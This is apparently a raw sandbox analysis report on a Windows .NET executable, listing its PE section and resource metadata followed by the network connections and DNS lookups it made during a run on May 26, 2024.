IMAGE_DIRECTORY_ENTRY_RESOURCE	0x14000	0xdf7	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1187c	0x11a00	3d6e533791620928fd39492a0a3ad3c7	False	0.4815769060283688	data	5.824026908691755	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x14000	0xdf7	0xe00	e73c0f845d354ad1dcfd9e586a52c901	False	0.40345982142857145	data	5.115868455822413	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x140a0	0x2d4	data			0.44613259668508287
RT_MANIFEST	0x14374	0xa83	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.40245261984392416

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 26, 2024 09:46:54.232307911 CEST	49674	443	192.168.2.6	173.222.162.64
May 26, 2024 09:46:54.248121023 CEST	49673	443	192.168.2.6	173.222.162.64
May 26, 2024 09:46:54.591602087 CEST	49672	443	192.168.2.6	173.222.162.64
May 26, 2024 09:47:03.841398001 CEST	49674	443	192.168.2.6	173.222.162.64
May 26, 2024 09:47:03.857659101 CEST	49673	443	192.168.2.6	173.222.162.64
May 26, 2024 09:47:04.201045990 CEST	49672	443	192.168.2.6	173.222.162.64
May 26, 2024 09:47:05.896071911 CEST	443	49698	173.222.162.64	192.168.2.6
May 26, 2024 09:47:05.896245003 CEST	49698	443	192.168.2.6	173.222.162.64
May 26, 2024 09:47:08.066662073 CEST	49712	443	192.168.2.6	13.107.246.60
May 26, 2024 09:47:08.066741943 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:08.066823959 CEST	49712	443	192.168.2.6	13.107.246.60
May 26, 2024 09:47:08.066900015 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:08.066981077 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:08.067051888 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:08.067106962 CEST	49712	443	192.168.2.6	13.107.246.60
May 26, 2024 09:47:08.067141056 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:08.067240000 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:08.067277908 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:08.799813986 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:08.800220966 CEST	49712	443	192.168.2.6	13.107.246.60
May 26, 2024 09:47:08.800261974 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:08.801242113 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:08.801429987 CEST	49712	443	192.168.2.6	13.107.246.60
May 26, 2024 09:47:08.802545071 CEST	49712	443	192.168.2.6	13.107.246.60
May 26, 2024 09:47:08.802545071 CEST	49712	443	192.168.2.6	13.107.246.60
May 26, 2024 09:47:08.802578926 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:08.802632093 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:08.819943905 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:08.820281029 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:08.820343971 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:08.821840048 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:08.822010040 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:08.823034048 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:08.823137999 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:08.823177099 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:08.858082056 CEST	49712	443	192.168.2.6	13.107.246.60
May 26, 2024 09:47:08.858091116 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:08.866575956 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:08.873260021 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:08.873317003 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:08.904367924 CEST	49712	443	192.168.2.6	13.107.246.60
May 26, 2024 09:47:08.923281908 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:08.929917097 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:08.929935932 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:08.929943085 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:08.929965973 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:08.929976940 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:08.929986954 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:08.930018902 CEST	49712	443	192.168.2.6	13.107.246.60
May 26, 2024 09:47:08.930051088 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:08.930098057 CEST	49712	443	192.168.2.6	13.107.246.60
May 26, 2024 09:47:08.930141926 CEST	49712	443	192.168.2.6	13.107.246.60
May 26, 2024 09:47:08.952975988 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:08.953047991 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:08.953068972 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:08.953107119 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:08.953125954 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:08.953145981 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:08.953260899 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:08.953260899 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:08.953260899 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:08.953262091 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:08.953262091 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:08.953329086 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:08.953481913 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.003315926 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:09.003326893 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:09.003371954 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:09.003429890 CEST	49712	443	192.168.2.6	13.107.246.60
May 26, 2024 09:47:09.003484011 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:09.003528118 CEST	49712	443	192.168.2.6	13.107.246.60
May 26, 2024 09:47:09.003851891 CEST	49712	443	192.168.2.6	13.107.246.60
May 26, 2024 09:47:09.004827976 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:09.014976025 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:09.014996052 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:09.015072107 CEST	49712	443	192.168.2.6	13.107.246.60
May 26, 2024 09:47:09.015099049 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:09.015147924 CEST	49712	443	192.168.2.6	13.107.246.60
May 26, 2024 09:47:09.019783974 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:09.019860983 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:09.019903898 CEST	49712	443	192.168.2.6	13.107.246.60
May 26, 2024 09:47:09.020771027 CEST	49712	443	192.168.2.6	13.107.246.60
May 26, 2024 09:47:09.021004915 CEST	49712	443	192.168.2.6	13.107.246.60
May 26, 2024 09:47:09.021038055 CEST	443	49712	13.107.246.60	192.168.2.6
May 26, 2024 09:47:09.039601088 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.039632082 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.039729118 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.039729118 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.039774895 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.039968967 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.051937103 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.051958084 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.052042007 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.052042007 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.052059889 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.052128077 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.119263887 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.119318008 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.119380951 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.119424105 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.119467020 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.119577885 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.125576973 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.125600100 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.125698090 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.125698090 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.125718117 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.130830050 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.131884098 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.131928921 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.131974936 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.131989002 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.132035017 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.132208109 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.135512114 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.135560036 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.135610104 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.135631084 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.135668993 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.135966063 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.210313082 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.210340023 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.210572958 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.210637093 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.210706949 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.214857101 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.214875937 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.214971066 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.214972019 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.214992046 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.215409040 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.218894005 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.218914986 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.219039917 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.219055891 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.219203949 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.222641945 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.222666025 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.222750902 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.222750902 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.222775936 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.222839117 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.224553108 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.224644899 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.224684000 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.224775076 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.225584030 CEST	49713	443	192.168.2.6	13.107.246.45
May 26, 2024 09:47:09.225613117 CEST	443	49713	13.107.246.45	192.168.2.6
May 26, 2024 09:47:09.276437044 CEST	49718	443	192.168.2.6	216.58.206.36
May 26, 2024 09:47:09.276519060 CEST	443	49718	216.58.206.36	192.168.2.6
May 26, 2024 09:47:09.276784897 CEST	49718	443	192.168.2.6	216.58.206.36
May 26, 2024 09:47:09.276786089 CEST	49718	443	192.168.2.6	216.58.206.36
May 26, 2024 09:47:09.276871920 CEST	443	49718	216.58.206.36	192.168.2.6
May 26, 2024 09:47:09.511519909 CEST	49719	443	192.168.2.6	2.19.104.72
May 26, 2024 09:47:09.511560917 CEST	443	49719	2.19.104.72	192.168.2.6
May 26, 2024 09:47:09.512451887 CEST	49719	443	192.168.2.6	2.19.104.72
May 26, 2024 09:47:09.515571117 CEST	49719	443	192.168.2.6	2.19.104.72
May 26, 2024 09:47:09.515590906 CEST	443	49719	2.19.104.72	192.168.2.6
May 26, 2024 09:47:09.954087973 CEST	443	49718	216.58.206.36	192.168.2.6
May 26, 2024 09:47:09.954606056 CEST	49718	443	192.168.2.6	216.58.206.36
May 26, 2024 09:47:09.954673052 CEST	443	49718	216.58.206.36	192.168.2.6
May 26, 2024 09:47:09.956235886 CEST	443	49718	216.58.206.36	192.168.2.6
May 26, 2024 09:47:09.956439018 CEST	49718	443	192.168.2.6	216.58.206.36
May 26, 2024 09:47:09.958548069 CEST	49718	443	192.168.2.6	216.58.206.36
May 26, 2024 09:47:09.958679914 CEST	443	49718	216.58.206.36	192.168.2.6
May 26, 2024 09:47:09.999696970 CEST	49718	443	192.168.2.6	216.58.206.36
May 26, 2024 09:47:09.999758959 CEST	443	49718	216.58.206.36	192.168.2.6
May 26, 2024 09:47:10.046504974 CEST	49718	443	192.168.2.6	216.58.206.36
May 26, 2024 09:47:10.174967051 CEST	443	49719	2.19.104.72	192.168.2.6
May 26, 2024 09:47:10.175050020 CEST	49719	443	192.168.2.6	2.19.104.72
May 26, 2024 09:47:10.181094885 CEST	49719	443	192.168.2.6	2.19.104.72
May 26, 2024 09:47:10.181148052 CEST	443	49719	2.19.104.72	192.168.2.6
May 26, 2024 09:47:10.181391954 CEST	443	49719	2.19.104.72	192.168.2.6
May 26, 2024 09:47:10.231620073 CEST	49719	443	192.168.2.6	2.19.104.72
May 26, 2024 09:47:10.322587967 CEST	49719	443	192.168.2.6	2.19.104.72
May 26, 2024 09:47:10.366580009 CEST	443	49719	2.19.104.72	192.168.2.6
May 26, 2024 09:47:10.502410889 CEST	443	49719	2.19.104.72	192.168.2.6
May 26, 2024 09:47:10.502458096 CEST	443	49719	2.19.104.72	192.168.2.6
May 26, 2024 09:47:10.502511024 CEST	49719	443	192.168.2.6	2.19.104.72
May 26, 2024 09:47:10.502703905 CEST	49719	443	192.168.2.6	2.19.104.72
May 26, 2024 09:47:10.502721071 CEST	443	49719	2.19.104.72	192.168.2.6
May 26, 2024 09:47:10.502759933 CEST	49719	443	192.168.2.6	2.19.104.72
May 26, 2024 09:47:10.502767086 CEST	443	49719	2.19.104.72	192.168.2.6
May 26, 2024 09:47:10.555039883 CEST	49724	443	192.168.2.6	2.19.104.72
May 26, 2024 09:47:10.555072069 CEST	443	49724	2.19.104.72	192.168.2.6
May 26, 2024 09:47:10.555161953 CEST	49724	443	192.168.2.6	2.19.104.72
May 26, 2024 09:47:10.555593014 CEST	49724	443	192.168.2.6	2.19.104.72
May 26, 2024 09:47:10.555605888 CEST	443	49724	2.19.104.72	192.168.2.6
May 26, 2024 09:47:11.264344931 CEST	443	49724	2.19.104.72	192.168.2.6
May 26, 2024 09:47:11.264477968 CEST	49724	443	192.168.2.6	2.19.104.72
May 26, 2024 09:47:11.266575098 CEST	49724	443	192.168.2.6	2.19.104.72
May 26, 2024 09:47:11.266585112 CEST	443	49724	2.19.104.72	192.168.2.6
May 26, 2024 09:47:11.266906023 CEST	443	49724	2.19.104.72	192.168.2.6
May 26, 2024 09:47:11.268335104 CEST	49724	443	192.168.2.6	2.19.104.72
May 26, 2024 09:47:11.314491034 CEST	443	49724	2.19.104.72	192.168.2.6
May 26, 2024 09:47:11.523228884 CEST	443	49724	2.19.104.72	192.168.2.6
May 26, 2024 09:47:11.523389101 CEST	443	49724	2.19.104.72	192.168.2.6
May 26, 2024 09:47:11.523497105 CEST	49724	443	192.168.2.6	2.19.104.72
May 26, 2024 09:47:11.524693966 CEST	49724	443	192.168.2.6	2.19.104.72
May 26, 2024 09:47:11.524707079 CEST	443	49724	2.19.104.72	192.168.2.6
May 26, 2024 09:47:16.989767075 CEST	49760	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:16.989803076 CEST	443	49760	20.12.23.50	192.168.2.6
May 26, 2024 09:47:16.989958048 CEST	49760	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:16.990892887 CEST	49760	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:16.990911007 CEST	443	49760	20.12.23.50	192.168.2.6
May 26, 2024 09:47:17.731466055 CEST	443	49760	20.12.23.50	192.168.2.6
May 26, 2024 09:47:17.731559038 CEST	49760	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:17.735414028 CEST	49760	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:17.735424042 CEST	443	49760	20.12.23.50	192.168.2.6
May 26, 2024 09:47:17.735819101 CEST	443	49760	20.12.23.50	192.168.2.6
May 26, 2024 09:47:17.793134928 CEST	49760	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:18.879544973 CEST	49760	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:18.922519922 CEST	443	49760	20.12.23.50	192.168.2.6
May 26, 2024 09:47:19.075723886 CEST	443	49760	20.12.23.50	192.168.2.6
May 26, 2024 09:47:19.075743914 CEST	443	49760	20.12.23.50	192.168.2.6
May 26, 2024 09:47:19.075750113 CEST	443	49760	20.12.23.50	192.168.2.6
May 26, 2024 09:47:19.075797081 CEST	443	49760	20.12.23.50	192.168.2.6
May 26, 2024 09:47:19.075810909 CEST	49760	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:19.075836897 CEST	443	49760	20.12.23.50	192.168.2.6
May 26, 2024 09:47:19.075862885 CEST	443	49760	20.12.23.50	192.168.2.6
May 26, 2024 09:47:19.075890064 CEST	443	49760	20.12.23.50	192.168.2.6
May 26, 2024 09:47:19.075906038 CEST	49760	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:19.075906038 CEST	49760	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:19.075918913 CEST	49760	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:19.075944901 CEST	49760	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:19.081151962 CEST	443	49760	20.12.23.50	192.168.2.6
May 26, 2024 09:47:19.081213951 CEST	443	49760	20.12.23.50	192.168.2.6
May 26, 2024 09:47:19.081242085 CEST	49760	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:19.081289053 CEST	49760	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:19.883758068 CEST	443	49718	216.58.206.36	192.168.2.6
May 26, 2024 09:47:19.883905888 CEST	443	49718	216.58.206.36	192.168.2.6
May 26, 2024 09:47:19.884073019 CEST	49718	443	192.168.2.6	216.58.206.36
May 26, 2024 09:47:20.052411079 CEST	49760	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:20.052443027 CEST	443	49760	20.12.23.50	192.168.2.6
May 26, 2024 09:47:20.052458048 CEST	49760	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:20.052464962 CEST	443	49760	20.12.23.50	192.168.2.6
May 26, 2024 09:47:20.172976971 CEST	49718	443	192.168.2.6	216.58.206.36
May 26, 2024 09:47:20.173054934 CEST	443	49718	216.58.206.36	192.168.2.6
May 26, 2024 09:47:21.230459929 CEST	49698	443	192.168.2.6	173.222.162.64
May 26, 2024 09:47:21.243892908 CEST	443	49698	173.222.162.64	192.168.2.6
May 26, 2024 09:47:56.716320992 CEST	49796	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:56.716357946 CEST	443	49796	20.12.23.50	192.168.2.6
May 26, 2024 09:47:56.716463089 CEST	49796	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:56.716803074 CEST	49796	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:56.716816902 CEST	443	49796	20.12.23.50	192.168.2.6
May 26, 2024 09:47:57.361835003 CEST	443	49796	20.12.23.50	192.168.2.6
May 26, 2024 09:47:57.361965895 CEST	49796	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:57.365536928 CEST	49796	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:57.365547895 CEST	443	49796	20.12.23.50	192.168.2.6
May 26, 2024 09:47:57.365880013 CEST	443	49796	20.12.23.50	192.168.2.6
May 26, 2024 09:47:57.377147913 CEST	49796	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:57.418539047 CEST	443	49796	20.12.23.50	192.168.2.6
May 26, 2024 09:47:57.612333059 CEST	443	49796	20.12.23.50	192.168.2.6
May 26, 2024 09:47:57.612411022 CEST	443	49796	20.12.23.50	192.168.2.6
May 26, 2024 09:47:57.612552881 CEST	49796	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:57.612576962 CEST	443	49796	20.12.23.50	192.168.2.6
May 26, 2024 09:47:57.612653971 CEST	49796	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:57.630894899 CEST	443	49796	20.12.23.50	192.168.2.6
May 26, 2024 09:47:57.631098032 CEST	443	49796	20.12.23.50	192.168.2.6
May 26, 2024 09:47:57.631233931 CEST	49796	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:57.631233931 CEST	49796	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:57.631464005 CEST	49796	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:57.631464005 CEST	49796	443	192.168.2.6	20.12.23.50
May 26, 2024 09:47:57.631489038 CEST	443	49796	20.12.23.50	192.168.2.6
May 26, 2024 09:47:57.631499052 CEST	443	49796	20.12.23.50	192.168.2.6
May 26, 2024 09:48:09.326401949 CEST	49798	443	192.168.2.6	216.58.206.36
May 26, 2024 09:48:09.326445103 CEST	443	49798	216.58.206.36	192.168.2.6
May 26, 2024 09:48:09.326534033 CEST	49798	443	192.168.2.6	216.58.206.36
May 26, 2024 09:48:09.326842070 CEST	49798	443	192.168.2.6	216.58.206.36
May 26, 2024 09:48:09.326862097 CEST	443	49798	216.58.206.36	192.168.2.6
May 26, 2024 09:48:09.989545107 CEST	443	49798	216.58.206.36	192.168.2.6
May 26, 2024 09:48:09.990031004 CEST	49798	443	192.168.2.6	216.58.206.36
May 26, 2024 09:48:09.990089893 CEST	443	49798	216.58.206.36	192.168.2.6
May 26, 2024 09:48:09.991589069 CEST	443	49798	216.58.206.36	192.168.2.6
May 26, 2024 09:48:09.992186069 CEST	49798	443	192.168.2.6	216.58.206.36
May 26, 2024 09:48:09.992378950 CEST	443	49798	216.58.206.36	192.168.2.6
May 26, 2024 09:48:10.043272018 CEST	49798	443	192.168.2.6	216.58.206.36
May 26, 2024 09:48:19.886270046 CEST	443	49798	216.58.206.36	192.168.2.6
May 26, 2024 09:48:19.886377096 CEST	443	49798	216.58.206.36	192.168.2.6
May 26, 2024 09:48:19.886501074 CEST	49798	443	192.168.2.6	216.58.206.36
May 26, 2024 09:48:21.376627922 CEST	49798	443	192.168.2.6	216.58.206.36
May 26, 2024 09:48:21.376698971 CEST	443	49798	216.58.206.36	192.168.2.6

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 26, 2024 09:47:04.822902918 CEST	53	56750	1.1.1.1	192.168.2.6
May 26, 2024 09:47:04.846541882 CEST	53	51554	1.1.1.1	192.168.2.6
May 26, 2024 09:47:06.255996943 CEST	53	55291	1.1.1.1	192.168.2.6
May 26, 2024 09:47:08.031049013 CEST	51335	53	192.168.2.6	1.1.1.1
May 26, 2024 09:47:08.031524897 CEST	65468	53	192.168.2.6	1.1.1.1
May 26, 2024 09:47:09.262948990 CEST	50860	53	192.168.2.6	1.1.1.1
May 26, 2024 09:47:09.263504982 CEST	54417	53	192.168.2.6	1.1.1.1
May 26, 2024 09:47:09.275506973 CEST	53	50860	1.1.1.1	192.168.2.6
May 26, 2024 09:47:09.275583029 CEST	53	54417	1.1.1.1	192.168.2.6
May 26, 2024 09:47:12.618710041 CEST	54548	53	192.168.2.6	1.1.1.1
May 26, 2024 09:47:12.618906021 CEST	55722	53	192.168.2.6	1.1.1.1
May 26, 2024 09:47:14.259082079 CEST	53	60101	1.1.1.1	192.168.2.6
May 26, 2024 09:47:23.422602892 CEST	53	54221	1.1.1.1	192.168.2.6
May 26, 2024 09:47:42.171257019 CEST	53	51266	1.1.1.1	192.168.2.6
May 26, 2024 09:48:04.559678078 CEST	53	63535	1.1.1.1	192.168.2.6
May 26, 2024 09:48:04.655445099 CEST	53	51693	1.1.1.1	192.168.2.6
May 26, 2024 09:48:13.754147053 CEST	50680	53	192.168.2.6	1.1.1.1
May 26, 2024 09:48:13.754409075 CEST	64899	53	192.168.2.6	1.1.1.1
May 26, 2024 09:48:33.376789093 CEST	53	54417	1.1.1.1	192.168.2.6

Timestamp	Source IP	Dest IP	Checksum	Code	Type
May 26, 2024 09:47:08.069577932 CEST	192.168.2.6	1.1.1.1	c2cf	(Port unreachable)	Destination Unreachable
May 26, 2024 09:48:04.559781075 CEST	192.168.2.6	1.1.1.1	c226	(Port unreachable)	Destination Unreachable
May 26, 2024 09:48:34.279515982 CEST	192.168.2.6	1.1.1.1	c235	(Port unreachable)	Destination Unreachable

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 26, 2024 09:47:08.056231976 CEST	1.1.1.1	192.168.2.6	0xf169	No error (0)	js.monitor.azure.com	aijscdn2.azureedge.net		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 09:47:08.056231976 CEST	1.1.1.1	192.168.2.6	0xf169	No error (0)	shed.dual-low.part-0017.t-0009.t-msedge.net	part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 09:47:08.056231976 CEST	1.1.1.1	192.168.2.6	0xf169	No error (0)	part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
May 26, 2024 09:47:08.056231976 CEST	1.1.1.1	192.168.2.6	0xf169	No error (0)	part-0017.t-0009.t-msedge.net		13.107.213.45	A (IP address)	IN (0x0001)	false
May 26, 2024 09:47:08.056246996 CEST	1.1.1.1	192.168.2.6	0x5c27	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 09:47:08.056246996 CEST	1.1.1.1	192.168.2.6	0x5c27	No error (0)	shed.dual-low.part-0032.t-0009.t-msedge.net	part-0032.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
May 26, 2024 09:47:08.056246996 CEST	1.1.1.1	192.168.2.6	0x5c27	No error (0)	part-0032.t-0009.t-msedge.net		13.107.246.60	A (IP address)	IN (0x0001)	false
